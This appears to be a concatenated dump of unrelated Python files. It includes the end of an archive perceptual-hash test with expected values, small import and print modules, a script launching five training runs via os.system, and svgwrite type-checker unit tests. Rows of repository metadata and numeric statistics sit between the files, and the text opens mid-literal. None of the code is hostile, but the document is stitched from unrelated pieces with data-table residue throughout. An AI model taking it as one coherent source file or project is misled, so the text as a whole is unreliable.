'type': 'image/jpeg'}),
('funny-pictures-cat-looks-like-an-owl.jpg',
{'hexHash': 'bd914f72d824d2a18d076f7643017505',
'imX': 492,
'imY': 442,
'pHash': -7960835595440524977,
'type': 'image/jpeg'}),
('funny-pictures-cat-will-do-science.jpg',
{'hexHash': '5b5620b0cfcb469aef632864707a0445',
'imX': 500,
'imY': 674,
'pHash': -8653036037266837299,
'type': 'image/jpeg'}),
('funny-pictures-kitten-rules-a-tower.jpg',
{'hexHash': 'a26d63bdbb38621b8f44c563ff496987',
'imX': 500,
'imY': 375,
'pHash': -1016743032983903389,
'type': 'image/jpeg'})],
'small.zip': [('e61ec521-155d-4a3a-956d-2544d4367e02-ps.png',
{'hexHash': 'b4c3d02411a34e1222972cc262a40b89',
'imX': 375,
'imY': 281,
'pHash': -1214778561678645686,
'type': 'image/png'}),
('funny-pictures-cat-looks-like-an-owl-ps.png',
{'hexHash': '740555f4e730ab2c6c261be7d53a3156',
'imX': 369,
'imY': 332,
'pHash': -7960835595440524977,
'type': 'image/png'}),
('funny-pictures-cat-will-do-science-ps.png',
{'hexHash': 'c47ed1cd79c4e7925b8015cb51bbab10',
'imX': 375,
'imY': 506,
'pHash': -8653036037266837299,
'type': 'image/png'}),
('funny-pictures-kitten-rules-a-tower-ps.png',
{'hexHash': 'fb64248009dde8605a95b041b772544a',
'imX': 375,
'imY': 281,
'pHash': -1016743032983903389,
'type': 'image/png'}),
('superheroes-batman-superman-i-would-watch-the-hell-out-of-this.jpg',
{'hexHash': '083e179ff11ccf90a0d514651c69c2ca',
'imX': 200,
'imY': 297,
'pHash': -2452239955093831550,
'type': 'image/jpeg'})],
'small_and_regular.zip': [('e61ec521-155d-4a3a-956d-2544d4367e02-ps.png',
{'hexHash': 'b4c3d02411a34e1222972cc262a40b89',
'imX': 375,
'imY': 281,
'pHash': -1214778561678645686,
'type': 'image/png'}),
('e61ec521-155d-4a3a-956d-2544d4367e02.jpg',
{'hexHash': '35484890b48148d260b52ebbb7493ffc',
'imX': 500,
'imY': 375,
'pHash': -1214778561678645686,
'type': 'image/jpeg'}),
('funny-pictures-cat-looks-like-an-owl-ps.png',
{'hexHash': '740555f4e730ab2c6c261be7d53a3156',
'imX': 369,
'imY': 332,
'pHash': -7960835595440524977,
'type': 'image/png'}),
('funny-pictures-cat-looks-like-an-owl.jpg',
{'hexHash': 'bd914f72d824d2a18d076f7643017505',
'imX': 492,
'imY': 442,
'pHash': -7960835595440524977,
'type': 'image/jpeg'}),
('funny-pictures-cat-will-do-science-ps.png',
{'hexHash': 'c47ed1cd79c4e7925b8015cb51bbab10',
'imX': 375,
'imY': 506,
'pHash': -8653036037266837299,
'type': 'image/png'}),
('funny-pictures-cat-will-do-science.jpg',
{'hexHash': '5b5620b0cfcb469aef632864707a0445',
'imX': 500,
'imY': 674,
'pHash': -8653036037266837299,
'type': 'image/jpeg'}),
('funny-pictures-kitten-rules-a-tower-ps.png',
{'hexHash': 'fb64248009dde8605a95b041b772544a',
'imX': 375,
'imY': 281,
'pHash': -1016743032983903389,
'type': 'image/png'}),
('funny-pictures-kitten-rules-a-tower.jpg',
{'hexHash': 'a26d63bdbb38621b8f44c563ff496987',
'imX': 500,
'imY': 375,
'pHash': -1016743032983903389,
'type': 'image/jpeg'})],
'small_and_regular_half_common.zip': [('718933691_2b0100d6d4_o.png',
{'hexHash': '8952f5ece2f5867c3ff2b6e8a55db21f',
'imX': 507,
'imY': 679,
'pHash': -8197763240258625978,
'type': 'image/png'}),
('CatT.png',
{'hexHash': '5f0aba1e6d1a7cf66c722f0fddb7ed18',
'imX': 125,
'imY': 201,
'pHash': -6104997819240060432,
'type': 'image/png'}),
('circuit_diagram.png',
{'hexHash': '494b166f7729f18906fae08d6bb93022',
'imX': 740,
'imY': 952,
'pHash': -1241034801844984807,
'type': 'image/png'}),
('e61ec521-155d-4a3a-956d-2544d4367e02-ps.png',
{'hexHash': 'b4c3d02411a34e1222972cc262a40b89',
'imX': 375,
'imY': 281,
'pHash': -1214778561678645686,
'type': 'image/png'}),
('e61ec521-155d-4a3a-956d-2544d4367e02.jpg',
{'hexHash': '35484890b48148d260b52ebbb7493ffc',
'imX': 500,
'imY': 375,
'pHash': -1214778561678645686,
'type': 'image/jpeg'}),
('funny-pictures-cat-looks-like-an-owl-ps.png',
{'hexHash': '740555f4e730ab2c6c261be7d53a3156',
'imX': 369,
'imY': 332,
'pHash': -7960835595440524977,
'type': 'image/png'}),
('funny-pictures-cat-looks-like-an-owl.jpg',
{'hexHash': 'bd914f72d824d2a18d076f7643017505',
'imX': 492,
'imY': 442,
'pHash': -7960835595440524977,
'type': 'image/jpeg'})],
'testArch.zip': [('Lolcat_this_is_mah_job.png',
{'hexHash': '1268e704908cc39299d73d6caafc23a0',
'imX': 493,
'imY': 389,
'pHash': -4992890192511777340,
'type': 'image/png'}),
('Lolcat_this_is_mah_job_small.jpg',
{'hexHash': '40d39c436e14282dcda06e8aff367307',
'imX': 300,
'imY': 237,
'pHash': -4992890192511777340,
'type': 'image/jpeg'}),
('dangerous-to-go-alone.jpg',
{'hexHash': 'dcd6097eeac911efed3124374f44085b',
'imX': 325,
'imY': 307,
'pHash': -7813072021139921681,
'type': 'image/jpeg'})],
'z_reg.zip': [('129165237051396578.jpg',
{'hexHash': 'b688e3ead00ca1453f860b408c446ec2',
'imX': 332,
'imY': 497,
'pHash': -3913567795023694905,
'type': 'image/jpeg'}),
('test.txt',
{'hexHash': 'b3a79c95a10b4cc0a838b35782b4dc0a',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'})],
'z_reg_junk.zip': [('129165237051396578.jpg',
{'hexHash': 'b688e3ead00ca1453f860b408c446ec2',
'imX': 332,
'imY': 497,
'pHash': -3913567795023694905,
'type': 'image/jpeg'}),
('Thumbs.db',
{'hexHash': '2ea0b76437adb1dfb8889beab9d7ef3b',
'imX': None,
'imY': None,
'pHash': None,
'type': 'application/CDFV2'}),
('__MACOSX/test.txt',
{'hexHash': '1ad84adee17e7d3525528ff7e381a900',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'}),
('deleted.txt',
{'hexHash': '2fe06876bc7694a6357e5d9c5f05e0ab',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'}),
('test.txt',
{'hexHash': 'b3a79c95a10b4cc0a838b35782b4dc0a',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'})],
'z_sml.zip': [('129165237051396578(s).jpg',
{'hexHash': '7c257ec7fdfd24f249d290dc47dcc71c',
'imX': 249,
'imY': 373,
'pHash': -3913567795023694905,
'type': 'image/jpeg'}),
('test.txt',
{'hexHash': 'b3a79c95a10b4cc0a838b35782b4dc0a',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'})],
'z_sml_u.zip': [('129165237051396578(s).jpg',
{'hexHash': '7c257ec7fdfd24f249d290dc47dcc71c',
'imX': 249,
'imY': 373,
'pHash': -3913567795023694905,
'type': 'image/jpeg'}),
('test.txt',
{'hexHash': '1234ae2e7a21c94100cb60773efe482b',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'})],
'z_sml_w.zip': [('129165237051396578(s).jpg',
{'hexHash': 'e8566233d43b2e964b77471a99c5fa36',
'imX': 100,
'imY': 100,
'pHash': -9223372036854775808,
'type': 'image/jpeg'}),
('test.txt',
{'hexHash': 'b3a79c95a10b4cc0a838b35782b4dc0a',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'})]
}
class TestSequenceFunctions(unittest.TestCase):
    def __init__(self, *args, **kwargs):
        logSetup.initLogging()
        super().__init__(*args, **kwargs)
        self.maxDiff = None

    def test_validate_arches(self):
        got = {}
        for arch_name in arches:
            cwd = os.path.dirname(os.path.realpath(__file__))
            archPath = os.path.join(cwd, 'test_ptree_base', arch_name)
            arch = pArch.PhashArchive(archPath)
            archHashes = list(arch.iterHashes())
            for item in archHashes:
                del item[1]['cont']
            got[arch_name] = archHashes
        expect_keys = list(expect.keys())
        got_keys = list(got.keys())
        expect_keys.sort()
        got_keys.sort()
        self.assertEqual(expect_keys, got_keys)
        print()
        print()
        pprint.pprint(expect)
        print()
        print()
        for key in expect_keys:
            if got[key] != expect[key]:
                print("Key:", key)
                pprint.pprint(expect[key])
        for key in expect_keys:
            self.assertEqual(expect[key], got[key])
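
    def regenerate_expected(self):
        # Hypothetical maintenance helper (sketch, not part of the original
        # suite): rebuilds the `expect` literal above from the fixture
        # archives, using only calls already exercised by test_validate_arches.
        got = {}
        for arch_name in arches:
            cwd = os.path.dirname(os.path.realpath(__file__))
            arch = pArch.PhashArchive(os.path.join(cwd, 'test_ptree_base', arch_name))
            archHashes = list(arch.iterHashes())
            for item in archHashes:
                del item[1]['cont']
            got[arch_name] = archHashes
        pprint.pprint(got)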
| 44.476886 | 89 | 0.404978 | 1,163 | 18,280 | 6.282889 | 0.184867 | 0.059121 | 0.056932 | 0.024634 | 0.791022 | 0.773368 | 0.763104 | 0.757493 | 0.755851 | 0.745997 | 0 | 0.269405 | 0.467177 | 18,280 | 410 | 90 | 44.585366 | 0.480801 | 0.002899 | 0 | 0.760309 | 0 | 0.005155 | 0.311399 | 0.190659 | 0 | 0 | 0 | 0 | 0.005155 | 1 | 0.005155 | false | 0 | 0.012887 | 0 | 0.020619 | 0.020619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
356f2b877a7dd5bde8889e6ff27ebdbdb036c5b6 | 83 | py | Python | build/lib/minotaur-manticore-maze/__init__.py | smidem/minotaur-manticore-maze | 0c08c83857b19be6cc6cae4b1f2acf5d485858a6 | [
"MIT"
] | null | null | null | build/lib/minotaur-manticore-maze/__init__.py | smidem/minotaur-manticore-maze | 0c08c83857b19be6cc6cae4b1f2acf5d485858a6 | [
"MIT"
] | null | null | null | build/lib/minotaur-manticore-maze/__init__.py | smidem/minotaur-manticore-maze | 0c08c83857b19be6cc6cae4b1f2acf5d485858a6 | [
"MIT"
] | null | null | null | from progress import Progress
print('\u2680','\u2681','\u2682','\u2683','\u2684')  # U+2680..U+2684: die faces one through five (⚀ ⚁ ⚂ ⚃ ⚄)
| 20.75 | 51 | 0.674699 | 10 | 83 | 5.6 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25974 | 0.072289 | 83 | 3 | 52 | 27.666667 | 0.467532 | 0 | 0 | 0 | 0 | 0 | 0.361446 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
35e853e7ea8737e680648b1d3ec560a37bb488cf | 223 | py | Python | dizoo/d4rl/config/__init__.py | sailxjx/DI-engine | c6763f8e2ba885a2a02f611195a1b5f8b50bff00 | [
"Apache-2.0"
] | 464 | 2021-07-08T07:26:33.000Z | 2022-03-31T12:35:16.000Z | dizoo/d4rl/config/__init__.py | sailxjx/DI-engine | c6763f8e2ba885a2a02f611195a1b5f8b50bff00 | [
"Apache-2.0"
] | 177 | 2021-07-09T08:22:55.000Z | 2022-03-31T07:35:22.000Z | dizoo/d4rl/config/__init__.py | sailxjx/DI-engine | c6763f8e2ba885a2a02f611195a1b5f8b50bff00 | [
"Apache-2.0"
] | 92 | 2021-07-08T12:16:37.000Z | 2022-03-31T09:24:41.000Z | from .hopper_cql_default_config import hopper_cql_default_config
from .hopper_expert_cql_default_config import hopper_expert_cql_default_config
from .hopper_medium_cql_default_config import hopper_medium_cql_default_config
| 55.75 | 78 | 0.932735 | 34 | 223 | 5.470588 | 0.235294 | 0.322581 | 0.516129 | 0.354839 | 0.946237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053812 | 223 | 3 | 79 | 74.333333 | 0.881517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
ea6c991e6b88cc3f19212a979f0e925db3ac8e4a | 515 | py | Python | train_mosmed_timm-regnetx_002_flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | train_mosmed_timm-regnetx_002_flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | train_mosmed_timm-regnetx_002_flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | import os
ls=["python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold0_flip.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold1_flip.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold2_flip.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold3_flip.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold4_flip.yml",
]
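# The five commands above differ only in the fold index; an equivalent, denser
# construction (sketch, assuming folds 0-4 are the complete set):
def build_fold_commands(n_folds=5):
    template = ("python main.py --configs "
                "configs/train_mosmed_unetplusplus_timm-regnetx_002_fold{}_flip.yml")
    return [template.format(i) for i in range(n_folds)]
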
for l in ls:
    os.system(l) | 46.818182 | 97 | 0.838835 | 80 | 515 | 5.025 | 0.3 | 0.124378 | 0.149254 | 0.236318 | 0.853234 | 0.853234 | 0.853234 | 0.853234 | 0.853234 | 0.853234 | 0 | 0.041322 | 0.060194 | 515 | 11 | 98 | 46.818182 | 0.789256 | 0 | 0 | 0 | 0 | 0 | 0.872093 | 0.629845 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9
57705961f81ab7e244ae8501d619af12e8ee91ac | 40 | py | Python | dotblotr/analysis/__init__.py | czbiohub/dotblotr | 42418e168e436b935be41638072ebc55a9c2cfbe | [
"MIT"
] | 1 | 2020-10-19T11:59:37.000Z | 2020-10-19T11:59:37.000Z | dotblotr/analysis/__init__.py | czbiohub/dotblotr | 42418e168e436b935be41638072ebc55a9c2cfbe | [
"MIT"
] | null | null | null | dotblotr/analysis/__init__.py | czbiohub/dotblotr | 42418e168e436b935be41638072ebc55a9c2cfbe | [
"MIT"
] | null | null | null | from .hit_counts import calc_hit_counts
| 20 | 39 | 0.875 | 7 | 40 | 4.571429 | 0.714286 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
57929860485c34828d1bea43bdeeee99b9bee625 | 18,289 | py | Python | dependencies/svgwrite/tests/test_full11_typechecker.py | charlesmchen/typefacet | 8c6db26d0c599ece16f3704696811275120a4044 | [
"Apache-2.0"
] | 21 | 2015-01-16T05:10:02.000Z | 2021-06-11T20:48:15.000Z | dependencies/svgwrite/tests/test_full11_typechecker.py | charlesmchen/typefacet | 8c6db26d0c599ece16f3704696811275120a4044 | [
"Apache-2.0"
] | 1 | 2019-09-09T12:10:27.000Z | 2020-05-22T10:12:14.000Z | dependencies/svgwrite/tests/test_full11_typechecker.py | charlesmchen/typefacet | 8c6db26d0c599ece16f3704696811275120a4044 | [
"Apache-2.0"
] | 2 | 2015-05-03T04:51:08.000Z | 2018-08-24T08:28:53.000Z | #!/usr/bin/env python
#coding:utf-8
# Author: mozman --<mozman@gmx.at>
# Purpose: test full11typechecker
# Created: 04.10.2010
# Copyright (C) 2010, Manfred Moitzi
# License: GPLv3
import sys
import unittest
from svgwrite.data.typechecker import Full11TypeChecker
class TestFull11TypeChecker(unittest.TestCase):
    def setUp(self):
        self.checker = Full11TypeChecker()

    def test_version(self):
        self.assertEqual(('1.1', 'full'), self.checker.get_version())

    def test_is_anything(self):
        """ Everything is valid. """
        self.assertTrue(self.checker.is_anything('abcdef :::\n \r \t all is valid äüß'))
        self.assertTrue(self.checker.is_anything(100.0))
        self.assertTrue(self.checker.is_anything((100.0, 11)))
        self.assertTrue(self.checker.is_anything(dict(a=100, b=200)))

    def test_is_string(self):
        """ Everything is valid. """
        self.assertTrue(self.checker.is_anything('abcdef :::\n \r \t all is valid äüß'))
        self.assertTrue(self.checker.is_anything(100.0))
        self.assertTrue(self.checker.is_anything((100.0, 11)))
        self.assertTrue(self.checker.is_anything(dict(a=100, b=200)))

    def test_is_number(self):
        """ Integer and Float, also as String '100' or '3.1415'. """
        # big numbers only valid for full profile
        self.assertTrue(self.checker.is_number(100000))
        self.assertTrue(self.checker.is_number(-100000))
        self.assertTrue(self.checker.is_number(3.141592))
        self.assertTrue(self.checker.is_number('100000'))
        self.assertTrue(self.checker.is_number('-100000'))
        self.assertTrue(self.checker.is_number('3.141592'))

    def test_is_not_number(self):
        self.assertFalse(self.checker.is_number( (1,2) ))
        self.assertFalse(self.checker.is_number('manfred'))
        self.assertFalse(self.checker.is_number( dict(a=1, b=2) ))

    def test_is_name(self):
        self.assertTrue(self.checker.is_name('mozman-öäüß'))
        self.assertTrue(self.checker.is_name('mozman:mozman'))
        self.assertTrue(self.checker.is_name('mozman:mozman[2]'))
        # not only strings allowed
        self.assertTrue(self.checker.is_name(100))
        self.assertTrue(self.checker.is_name(100.123))

    def test_is_not_name(self):
        self.assertFalse(self.checker.is_name(''))
        self.assertFalse(self.checker.is_name('mozman,mozman[2]'))
        self.assertFalse(self.checker.is_name('mozman mozman[2]'))
        self.assertFalse(self.checker.is_name('mozman(mozman)[2]'))
        # tuple and dict contains ',', '(', ')' or ' '
        self.assertFalse(self.checker.is_name((100, 200)))
        self.assertFalse(self.checker.is_name(dict(a=100, b=200)))

    def test_is_length(self):
        for value in [' 100px ', ' -100ex ', ' 100em ', ' -100pt ',
                      ' 100pc ', ' 100mm', ' 100cm', ' 100in',
                      ' 5%', 100, 3.1415, 700000, -500000, '100000',
                      '-4000000.45']:
            self.assertTrue(self.checker.is_length(value))

    def test_is_not_length(self):
        for value in [' 100xpx ', ' -100km ', ' 100mi ', (1, 1),
                      dict(a=1, b=2), [1, 2], ' mozman ']:
            self.assertFalse(self.checker.is_length(value))

    def test_is_integer(self):
        """ Integer also as String '100'. """
        # big numbers only valid for full profile
        self.assertTrue(self.checker.is_integer(100000))
        self.assertTrue(self.checker.is_integer(-100000))
        self.assertTrue(self.checker.is_integer('100000'))
        self.assertTrue(self.checker.is_integer('-100000'))

    def test_is_not_integer(self):
        self.assertFalse(self.checker.is_integer( (1,2) ))
        self.assertFalse(self.checker.is_integer('manfred'))
        self.assertFalse(self.checker.is_integer( dict(a=1, b=2) ))
        self.assertFalse(self.checker.is_integer(3.141592))
        self.assertFalse(self.checker.is_integer('3.141592'))

    def test_is_percentage(self):
        self.assertTrue(self.checker.is_percentage(100))
        self.assertTrue(self.checker.is_percentage(50.123))
        self.assertTrue(self.checker.is_percentage(1000))
        self.assertTrue(self.checker.is_percentage('100'))
        self.assertTrue(self.checker.is_percentage('50.123'))
        self.assertTrue(self.checker.is_percentage('1000'))
        self.assertTrue(self.checker.is_percentage(' 100% '))
        self.assertTrue(self.checker.is_percentage(' 50.123% '))
        self.assertTrue(self.checker.is_percentage(' 1000% '))

    def test_is_not_percentage(self):
        self.assertFalse(self.checker.is_percentage('100px'))
        self.assertFalse(self.checker.is_percentage('100cm'))
        self.assertFalse(self.checker.is_percentage(' mozman '))
        self.assertFalse(self.checker.is_percentage( (1, 2) ))
        self.assertFalse(self.checker.is_percentage( dict(a=1, b=2) ))

    def test_is_time(self):
        self.assertTrue(self.checker.is_time(100))
        self.assertTrue(self.checker.is_time(50.123))
        self.assertTrue(self.checker.is_time(1000))
        self.assertTrue(self.checker.is_time(' 100 '))
        self.assertTrue(self.checker.is_time(' 50.123 '))
        self.assertTrue(self.checker.is_time(' 1000 '))
        self.assertTrue(self.checker.is_time(' 100ms'))
        self.assertTrue(self.checker.is_time(' 50.123s'))
        self.assertTrue(self.checker.is_time(' 1000ms'))

    def test_is_not_time(self):
        self.assertFalse(self.checker.is_time('100px'))
        self.assertFalse(self.checker.is_time('100cm'))
        self.assertFalse(self.checker.is_time(' mozman '))
        self.assertFalse(self.checker.is_time( (1, 2) ))
        self.assertFalse(self.checker.is_time( dict(a=1, b=2) ))

    def test_is_angle(self):
        self.assertTrue(self.checker.is_angle(100))
        self.assertTrue(self.checker.is_angle(50.123))
        self.assertTrue(self.checker.is_angle(1000))
        self.assertTrue(self.checker.is_angle(' 100 '))
        self.assertTrue(self.checker.is_angle(' 50.123 '))
        self.assertTrue(self.checker.is_angle(' 1000 '))
        self.assertTrue(self.checker.is_angle(' 100rad'))
        self.assertTrue(self.checker.is_angle(' 50.123grad'))
        self.assertTrue(self.checker.is_angle(' 1000deg'))

    def test_is_not_angle(self):
        self.assertFalse(self.checker.is_angle('100px'))
        self.assertFalse(self.checker.is_angle('100cm'))
        self.assertFalse(self.checker.is_angle(' mozman '))
        self.assertFalse(self.checker.is_angle( (1, 2) ))
        self.assertFalse(self.checker.is_angle( dict(a=1, b=2) ))

    def test_is_frequency(self):
        self.assertTrue(self.checker.is_frequency(100))
        self.assertTrue(self.checker.is_frequency(50.123))
        self.assertTrue(self.checker.is_frequency(1000))
        self.assertTrue(self.checker.is_frequency(' 100 '))
        self.assertTrue(self.checker.is_frequency(' 50.123 '))
        self.assertTrue(self.checker.is_frequency(' 1000 '))
        self.assertTrue(self.checker.is_frequency(' 100Hz'))
        self.assertTrue(self.checker.is_frequency(' 50.123kHz'))
        self.assertTrue(self.checker.is_frequency(' 1000Hz'))

    def test_is_not_frequency(self):
        self.assertFalse(self.checker.is_frequency('100px'))
        self.assertFalse(self.checker.is_frequency('100cm'))
        self.assertFalse(self.checker.is_frequency(' mozman '))
        self.assertFalse(self.checker.is_frequency( (1, 2) ))
        self.assertFalse(self.checker.is_frequency( dict(a=1, b=2) ))

    def test_is_shape(self):
        self.assertTrue(self.checker.is_shape(' rect(1, 2, 3, 4)'))
        self.assertTrue(self.checker.is_shape(' rect(1cm, 2mm, -3px, 4%)'))

    def test_is_not_shape(self):
        self.assertFalse(self.checker.is_shape('rect(1, 2, 3)'))
        self.assertFalse(self.checker.is_shape('rect(1, 2, 3, 4, 5)'))
        self.assertFalse(self.checker.is_shape('rect(1, 2, 3, m)'))

    def test_is_number_optional_number(self):
        self.assertTrue(self.checker.is_number_optional_number(' 1, 2'))
        self.assertTrue(self.checker.is_number_optional_number('1 2. '))
        self.assertTrue(self.checker.is_number_optional_number('1 '))
        self.assertTrue(self.checker.is_number_optional_number(' 1.5 '))
        self.assertTrue(self.checker.is_number_optional_number( 1 ))
        self.assertTrue(self.checker.is_number_optional_number( [1, 2] ))

    def test_is_not_number_optional_number(self):
        self.assertFalse(self.checker.is_number_optional_number(' 1px, 2'))
        self.assertFalse(self.checker.is_number_optional_number(''))
        self.assertFalse(self.checker.is_number_optional_number(' , 2'))
        self.assertFalse(self.checker.is_number_optional_number(' 1 , 2 , 3'))
        self.assertFalse(self.checker.is_number_optional_number(' 1. 2. 3.'))
        self.assertFalse(self.checker.is_number_optional_number(' 1 2 3'))
        self.assertFalse(self.checker.is_number_optional_number([]))
        self.assertFalse(self.checker.is_number_optional_number([1,2,3]))
        self.assertFalse(self.checker.is_number_optional_number([1, '1px']))

    def test_is_IRI(self):
        # every none empty string is valid - no real url validation is done
        self.assertTrue(self.checker.is_IRI("http://localhost:8080?a=12"))
        self.assertTrue(self.checker.is_IRI("%&/(/&%$"))

    def test_is_not_IRI(self):
        self.assertFalse(self.checker.is_IRI(""))
        self.assertFalse(self.checker.is_IRI(1))
        self.assertFalse(self.checker.is_IRI(3.1415))
        self.assertFalse(self.checker.is_IRI( (1, 0)))
        self.assertFalse(self.checker.is_IRI(dict(a=1)))

    def test_is_FuncIRI(self):
        self.assertTrue(self.checker.is_FuncIRI("url(http://localhost:8080?a=12)"))
        self.assertTrue(self.checker.is_FuncIRI("url(ftp://something/234)"))

    def test_is_not_FuncIRI(self):
        self.assertFalse(self.checker.is_FuncIRI("url()"))
        self.assertFalse(self.checker.is_FuncIRI("url"))
        self.assertFalse(self.checker.is_FuncIRI("url("))
        self.assertFalse(self.checker.is_FuncIRI("url(http://localhost:8080"))
        self.assertFalse(self.checker.is_FuncIRI("http://localhost:8080"))

    def test_is_semicolon_list(self):
        self.assertTrue(self.checker.is_semicolon_list("1;2;3;4;5"))
        self.assertTrue(self.checker.is_semicolon_list("1;2,3;4,5"))
        self.assertTrue(self.checker.is_semicolon_list("1.;2.,3.;4.,5."))
        self.assertTrue(self.checker.is_semicolon_list("1"))
        self.assertTrue(self.checker.is_semicolon_list("1 2;3;4;5"))

    def test_is_not_semicolon_list(self):
        # only numbers!
        self.assertFalse(self.checker.is_semicolon_list("1 A;3 4;5,Z"))
        self.assertFalse(self.checker.is_semicolon_list(""))

    def test_is_icc_color(self):
        self.assertTrue(self.checker.is_icccolor("icc-color(red)"))
        self.assertTrue(self.checker.is_icccolor("icc-color(red mozman)"))
        self.assertTrue(self.checker.is_icccolor("icc-color(red,mozman)"))
        self.assertTrue(self.checker.is_icccolor("icc-color(red,mozman 123)"))

    def test_is_not_icc_color(self):
        self.assertFalse(self.checker.is_icccolor("icc-color()"))
        self.assertFalse(self.checker.is_icccolor("icc-color((a))"))

    def test_is_hex_color(self):
        self.assertTrue(self.checker.is_color("#101010"))
        self.assertTrue(self.checker.is_color("#111"))
        self.assertTrue(self.checker.is_color("#FFFFFF"))
        self.assertTrue(self.checker.is_color("#FFF"))
        self.assertTrue(self.checker.is_color("#aaaaaa"))
        self.assertTrue(self.checker.is_color("#aaa"))

    def test_is_not_hex_color(self):
        self.assertFalse(self.checker.is_color("#1"))
        self.assertFalse(self.checker.is_color("#22"))
        self.assertFalse(self.checker.is_color("#4444"))
        self.assertFalse(self.checker.is_color("#55555"))
        self.assertFalse(self.checker.is_color("#7777777"))
        self.assertFalse(self.checker.is_color("#gghhii"))

    def test_is_rgb_int_color(self):
        self.assertTrue(self.checker.is_color("rgb(1,2,3)"))
        self.assertTrue(self.checker.is_color("rgb( 1, 2, 3 )"))
        self.assertTrue(self.checker.is_color("rgb( 11, 21, 31 )"))
        self.assertTrue(self.checker.is_color("rgb( 0, 0, 0 )"))
        self.assertTrue(self.checker.is_color("rgb( 255 , 255 , 255 )"))

    def test_is_not_rgb_int_color(self):
        self.assertFalse(self.checker.is_color("rgb(,2,3)"))
        self.assertFalse(self.checker.is_color("rgb(1,,3)"))
        self.assertFalse(self.checker.is_color("rgb(1,2)"))
        self.assertFalse(self.checker.is_color("rgb(1)"))
        self.assertFalse(self.checker.is_color("rgb(a,2,3)"))
        self.assertFalse(self.checker.is_color("rgb()"))

    def test_is_rgb_percentage_color(self):
        self.assertTrue(self.checker.is_color("rgb(1%,2%,3%)"))
        self.assertTrue(self.checker.is_color("rgb( 1%, 2%, 3% )"))
        self.assertTrue(self.checker.is_color("rgb( 11%, 21%, 31% )"))
        self.assertTrue(self.checker.is_color("rgb( 0%, 0%, 0% )"))
        # this is not really valid
        self.assertTrue(self.checker.is_color("rgb( 255% , 255% , 255% )"))

    def test_is_not_rgb_percentage_color(self):
        self.assertFalse(self.checker.is_color("rgb()"))
        self.assertFalse(self.checker.is_color("rgb(1,2%,3%)"))
        self.assertFalse(self.checker.is_color("rgb(,2%,3%)"))
        self.assertFalse(self.checker.is_color("rgb(,,)"))
        self.assertFalse(self.checker.is_color("rgb(a%,b%,c%)"))
        # no decimal points
        self.assertFalse(self.checker.is_color("rgb(1.0%, 2.0%, 3.0%)"))

    def test_is_color_name(self):
        self.assertTrue(self.checker.is_color("blue"))

    def test_is_not_color_name(self):
        self.assertFalse(self.checker.is_color("blau"))

    def test_is_paint_with_funcIRI(self):
        self.assertTrue(self.checker.is_paint("rgb(10, 20, 30)"))

    def test_is_paint_with_funcIRI_2(self):
        self.assertTrue(self.checker.is_paint("rgb(10, 20, 30) none"))

    def test_is_paint_with_funcIRI_3(self):
        self.assertTrue(self.checker.is_paint("url(localhost) rgb(10, 20, 30)"))

    def test_is_paint(self):
        self.assertTrue(self.checker.is_paint("inherit"))
